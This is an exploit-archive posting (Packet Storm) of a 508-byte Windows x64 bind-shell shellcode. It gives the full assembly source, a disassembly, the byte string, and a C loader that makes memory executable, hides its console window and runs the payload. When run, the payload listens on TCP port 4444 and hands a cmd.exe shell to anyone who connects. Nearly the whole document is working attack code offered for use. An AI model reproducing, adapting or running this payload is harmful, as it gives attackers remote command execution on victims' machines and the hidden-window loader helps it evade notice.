508 bytes small Windows x64 bind shell TCP shellcode.
033c378fbb4c4aa3050bd53ba4c5a36a47e8578b1899c71cde7dd3d1b6026185/*
# Title : Windows x64 Bind Shell TCP Shellcode
# size : 508 bytes
# Date : 08-12-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 7 Professional x64
*/
/*
section .text
global _start
_start:
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov r14,[rsi+0x30]
;----------------------
mov dl,0x88
mov ebx,[r14+0x3c]
add rbx,r14
mov ebx,[rbx+rdx]
add rbx,r14
;--------------------------
mov esi,[rbx+0x1c]
add rsi,r14 ;kernel32.dll base address
;-------------------------------
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,r14 ;LoadLibraryA()
;-------------------------------
mov dl,128
sub rsp,rdx
lea r12,[rsp]
;----------------------------------------------------
;loading ws2_32.dll
xor rdx,rdx
mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl
lea rcx,[r12]
sub rsp,88
call rbx
mov r15,rax ;ws2_32.dll base address
;--------------------------------------------------
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]
add rbx,r15
mov ebx,[rbx+rdx]
add rbx,r15
mov edi,[rbx+0x1c]
add rdi,r15
;------------------------------
mov dx,114*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSAStartup()
;-----------------------------------
;WSAStartup(514,&WSADATA)
xor rcx,rcx
mov cx,408
sub rsp,rcx
lea rdx,[rsp]
mov cx,514
sub rsp,88
call rbx
;-------------------------------------------
xor rdx,rdx
mov dx,98*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSASocketA()
;WSASocket(2,1,6,0,0,0)
push 6
push 1
push 2
pop rcx
pop rdx
pop r8
xor r9,r9
mov [rsp+32],r9
mov [rsp+40],r9
call rbx
mov r13,rax ;SOCKET
;--------------------------------------------
mov ebx,[rdi+80]
add rbx,r15 ;setsockopt()
;setsockopt(SOCKET,0xffff,4,&1,4)
xor rdx,rdx
mov rcx,r13
mov dx,0xffff
push 4
pop r8
mov [rsp],byte 1
lea r9,[rsp]
sub rsp,88
mov [rsp+32],r8
call rbx
;--------------------------------------------------
mov ebx,[rdi+4]
add rbx,r15 ;bind()
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
push 16
pop r8
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov [r12],byte 2
mov [r12+2],word 0x5c11 ;port 4444 (change it if U want)
lea rdx,[r12]
mov rcx,r13
call rbx
;----------------------------------------
mov ebx,[rdi+48]
add rbx,r15 ;listen()
;listen(SOCKET,1)
push 1
pop rdx
push r13
pop rcx
call rbx
;-----------------------------------
mov ebx,[rdi]
add rbx,r15 ;accept()
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov dl,16
push rdx
lea r8,[rsp]
lea rdx,[r12]
mov rcx,r13
sub rsp,88
call rbx
;-------------------------------------------
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],rax
mov [r12+0x58],rax
mov [r12+0x60],rax
;--------------------------------------------------
mov [r12-4],dword 'cmdA'
mov [r12-1],byte cl
;-----------------------------------------
sub rsp,88
;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)
lea rdx,[r12-4] ;"cmd"
xor r8,r8 ;NULL
push r8
pop r9 ;NULL
mov [rsp+32],byte 1 ;TRUE
mov [rsp+40],r8 ;0
mov [rsp+48],r8 ;NULL
mov [rsp+56],r8 ;NULL
lea rax,[r12]
mov [rsp+64],rax
lea rax,[r12+104]
mov [rsp+72],rax
xor r10,r10
mov r10w,165*4
mov ebx,[rsi+r10]
add rbx,r14 ;CreateProcessA()
call rbx
;-----------------------------------------------
mov r10w,297*4
mov ebx,[rsi+r10]
add rbx,r14
push 1
pop rcx
add rsp,88
call rbx
*/
/*
file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 4c 8b 76 30 mov 0x30(%rsi),%r14
19: b2 88 mov $0x88,%dl
1b: 41 8b 5e 3c mov 0x3c(%r14),%ebx
1f: 4c 01 f3 add %r14,%rbx
22: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
25: 4c 01 f3 add %r14,%rbx
28: 8b 73 1c mov 0x1c(%rbx),%esi
2b: 4c 01 f6 add %r14,%rsi
2e: 66 ba 40 03 mov $0x340,%dx
32: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
35: 4c 01 f3 add %r14,%rbx
38: b2 80 mov $0x80,%dl
3a: 48 29 d4 sub %rdx,%rsp
3d: 4c 8d 24 24 lea (%rsp),%r12
41: 48 31 d2 xor %rdx,%rdx
44: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)
4b: 5f
4c: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
53: 32
54: 41 88 54 24 06 mov %dl,0x6(%r12)
59: 49 8d 0c 24 lea (%r12),%rcx
5d: 48 83 ec 58 sub $0x58,%rsp
61: ff d3 callq *%rbx
63: 49 89 c7 mov %rax,%r15
66: 48 31 d2 xor %rdx,%rdx
69: b2 88 mov $0x88,%dl
6b: 41 8b 5f 3c mov 0x3c(%r15),%ebx
6f: 4c 01 fb add %r15,%rbx
72: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
75: 4c 01 fb add %r15,%rbx
78: 8b 7b 1c mov 0x1c(%rbx),%edi
7b: 4c 01 ff add %r15,%rdi
7e: 66 ba c8 01 mov $0x1c8,%dx
82: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
85: 4c 01 fb add %r15,%rbx
88: 48 31 c9 xor %rcx,%rcx
8b: 66 b9 98 01 mov $0x198,%cx
8f: 48 29 cc sub %rcx,%rsp
92: 48 8d 14 24 lea (%rsp),%rdx
96: 66 b9 02 02 mov $0x202,%cx
9a: 48 83 ec 58 sub $0x58,%rsp
9e: ff d3 callq *%rbx
a0: 48 31 d2 xor %rdx,%rdx
a3: 66 ba 88 01 mov $0x188,%dx
a7: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
aa: 4c 01 fb add %r15,%rbx
ad: 6a 06 pushq $0x6
af: 6a 01 pushq $0x1
b1: 6a 02 pushq $0x2
b3: 59 pop %rcx
b4: 5a pop %rdx
b5: 41 58 pop %r8
b7: 4d 31 c9 xor %r9,%r9
ba: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
bf: 4c 89 4c 24 28 mov %r9,0x28(%rsp)
c4: ff d3 callq *%rbx
c6: 49 89 c5 mov %rax,%r13
c9: 8b 5f 50 mov 0x50(%rdi),%ebx
cc: 4c 01 fb add %r15,%rbx
cf: 48 31 d2 xor %rdx,%rdx
d2: 4c 89 e9 mov %r13,%rcx
d5: 66 ba ff ff mov $0xffff,%dx
d9: 6a 04 pushq $0x4
db: 41 58 pop %r8
dd: c6 04 24 01 movb $0x1,(%rsp)
e1: 4c 8d 0c 24 lea (%rsp),%r9
e5: 48 83 ec 58 sub $0x58,%rsp
e9: 4c 89 44 24 20 mov %r8,0x20(%rsp)
ee: ff d3 callq *%rbx
f0: 8b 5f 04 mov 0x4(%rdi),%ebx
f3: 4c 01 fb add %r15,%rbx
f6: 6a 10 pushq $0x10
f8: 41 58 pop %r8
fa: 48 31 d2 xor %rdx,%rdx
fd: 49 89 14 24 mov %rdx,(%r12)
101: 49 89 54 24 08 mov %rdx,0x8(%r12)
106: 41 c6 04 24 02 movb $0x2,(%r12)
10b: 66 41 c7 44 24 02 11 movw $0x5c11,0x2(%r12)
112: 5c
113: 49 8d 14 24 lea (%r12),%rdx
117: 4c 89 e9 mov %r13,%rcx
11a: ff d3 callq *%rbx
11c: 8b 5f 30 mov 0x30(%rdi),%ebx
11f: 4c 01 fb add %r15,%rbx
122: 6a 01 pushq $0x1
124: 5a pop %rdx
125: 41 55 push %r13
127: 59 pop %rcx
128: ff d3 callq *%rbx
12a: 8b 1f mov (%rdi),%ebx
12c: 4c 01 fb add %r15,%rbx
12f: 48 31 d2 xor %rdx,%rdx
132: 49 89 14 24 mov %rdx,(%r12)
136: 49 89 54 24 08 mov %rdx,0x8(%r12)
13b: b2 10 mov $0x10,%dl
13d: 52 push %rdx
13e: 4c 8d 04 24 lea (%rsp),%r8
142: 49 8d 14 24 lea (%r12),%rdx
146: 4c 89 e9 mov %r13,%rcx
149: 48 83 ec 58 sub $0x58,%rsp
14d: ff d3 callq *%rbx
14f: 48 31 d2 xor %rdx,%rdx
152: 49 89 14 24 mov %rdx,(%r12)
156: 49 89 54 24 08 mov %rdx,0x8(%r12)
15b: b2 68 mov $0x68,%dl
15d: 48 31 c9 xor %rcx,%rcx
160: 41 89 14 24 mov %edx,(%r12)
164: 49 89 4c 24 04 mov %rcx,0x4(%r12)
169: 49 89 4c 24 0c mov %rcx,0xc(%r12)
16e: 49 89 4c 24 14 mov %rcx,0x14(%r12)
173: 49 89 4c 24 18 mov %rcx,0x18(%r12)
178: b2 ff mov $0xff,%dl
17a: 48 ff c2 inc %rdx
17d: 41 89 54 24 3c mov %edx,0x3c(%r12)
182: 49 89 44 24 50 mov %rax,0x50(%r12)
187: 49 89 44 24 58 mov %rax,0x58(%r12)
18c: 49 89 44 24 60 mov %rax,0x60(%r12)
191: 41 c7 44 24 fc 63 6d movl $0x41646d63,-0x4(%r12)
198: 64 41
19a: 41 88 4c 24 ff mov %cl,-0x1(%r12)
19f: 48 83 ec 58 sub $0x58,%rsp
1a3: 49 8d 54 24 fc lea -0x4(%r12),%rdx
1a8: 4d 31 c0 xor %r8,%r8
1ab: 41 50 push %r8
1ad: 41 59 pop %r9
1af: c6 44 24 20 01 movb $0x1,0x20(%rsp)
1b4: 4c 89 44 24 28 mov %r8,0x28(%rsp)
1b9: 4c 89 44 24 30 mov %r8,0x30(%rsp)
1be: 4c 89 44 24 38 mov %r8,0x38(%rsp)
1c3: 49 8d 04 24 lea (%r12),%rax
1c7: 48 89 44 24 40 mov %rax,0x40(%rsp)
1cc: 49 8d 44 24 68 lea 0x68(%r12),%rax
1d1: 48 89 44 24 48 mov %rax,0x48(%rsp)
1d6: 4d 31 d2 xor %r10,%r10
1d9: 66 41 ba 94 02 mov $0x294,%r10w
1de: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1e2: 4c 01 f3 add %r14,%rbx
1e5: ff d3 callq *%rbx
1e7: 66 41 ba a4 04 mov $0x4a4,%r10w
1ec: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1f0: 4c 01 f3 add %r14,%rbx
1f3: 6a 01 pushq $0x1
1f5: 59 pop %rcx
1f6: 48 83 c4 58 add $0x58,%rsp
1fa: ff d3 callq *%rbx
*/
#include<windows.h>
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x4c\x8b\x76\x30\xb2\x88\x41\x8b\x5e\x3c\x4c\x01\xf3\x8b\x1c\x13\x4c\x01\xf3\x8b\x73\x1c\x4c\x01\xf6\x66\xba\x40\x03\x8b\x1c\x96\x4c\x01\xf3\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x8b\x7b\x1c\x4c\x01\xff\x66\xba\xc8\x01\x8b\x1c\x17\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x66\xba\x88\x01\x8b\x1c\x17\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x8b\x5f\x50\x4c\x01\xfb\x48\x31\xd2\x4c\x89\xe9\x66\xba\xff\xff\x6a\x04\x41\x58\xc6\x04\x24\x01\x4c\x8d\x0c\x24\x48\x83\xec\x58\x4c\x89\x44\x24\x20\xff\xd3\x8b\x5f\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x11\x5c\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x8b\x5f\x30\x4c\x01\xfb\x6a\x01\x5a\x41\x55\x59\xff\xd3\x8b\x1f\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x41\xc7\x44\x24\xfc\x63\x6d\x64\x41\x41\x88\x4c\x24\xff\x48\x83\xec\x58\x49\x8d\x54\x24\xfc\x4d\x31\xc0\x41\x50\x41\x59\xc6\x44\x24\x20\x01\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x49\x8d\x04\x24\x48\x89\x44\x24\x40\x49\x8d\x44\x24\x68\x48\x89\x44\x24\x48\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x4c\x01\xf3\xff\xd3\x66\x41\xba\xa4\x04\x42\x8b\x1c\x16\x4c\x01\xf3\x6a\x01\x59\x48\x83\xc4\x58\xff\xd3";
int main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
//making memory executbale
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
//hiding windows
AllocConsole();
ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);
//
(* (int(*)()) shellcode)();
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed